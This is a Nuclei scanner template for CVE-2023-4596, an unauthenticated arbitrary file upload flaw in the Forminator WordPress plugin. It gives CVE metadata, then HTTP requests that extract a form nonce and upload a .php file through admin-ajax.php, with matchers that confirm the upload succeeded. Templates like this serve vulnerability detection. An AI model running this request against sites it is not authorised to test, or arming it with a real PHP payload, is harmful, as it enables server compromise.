id: CVE-2023-4596 info: name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload author: E1A severity: critical description: | The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. reference: - https://www.exploit-db.com/exploits/51664 - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php - https://github.com/E1A/CVE-2023-4596 - https://nvd.nist.gov/vuln/detail/CVE-2023-4596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4596 cwe-id: CWE-434 epss-score: 0.08202 epss-percentile: 0.93687 cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: incsub product: forminator framework: wordpress publicwww-query: /wp-content/plugins/Forminator tags: cve,cve2023,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="textarea-1" {{randstr}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="phone-1" {{rand_int(10)}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="email-1" test@gmail.com ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="name-1" {{randstr}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php" Content-Type: application/x-php ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="forminator_nonce" {{forminator_nonce}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="form_id" {{form_id}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="current_url" {{BaseURL}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="action" forminator_submit_form_custom-forms ------WebKitFormBoundaryBLOYSueQAdgN2PRe matchers-condition: and matchers: - type: word part: body_1 words: - 'Upload file' - 'forminator-field-upload' condition: and - type: word part: body_2 words: - '{"success":true' - '"form_id":"{{form_id}}"' - '"behav' condition: and - type: status status: - 200 extractors: - type: regex name: forminator_nonce part: body group: 1 regex: - 'name="forminator_nonce" value="([a-z0-9]+)" \/>' internal: true - type: regex name: form_id part: body group: 1 regex: - 'name="form_id" value="([0-9]+)">' internal: true # digest: 490a0046304402202ae98481b0091a80cc6a336e4e9073ebfa5ff244c7b7afbfb4f9e93f692c22260220182bfdd2f8821a4d44eaa01efe217cf76cc8ac7f91a7094dc578361ce8f8fc13:922c64590222798bb761d5b6d8e72950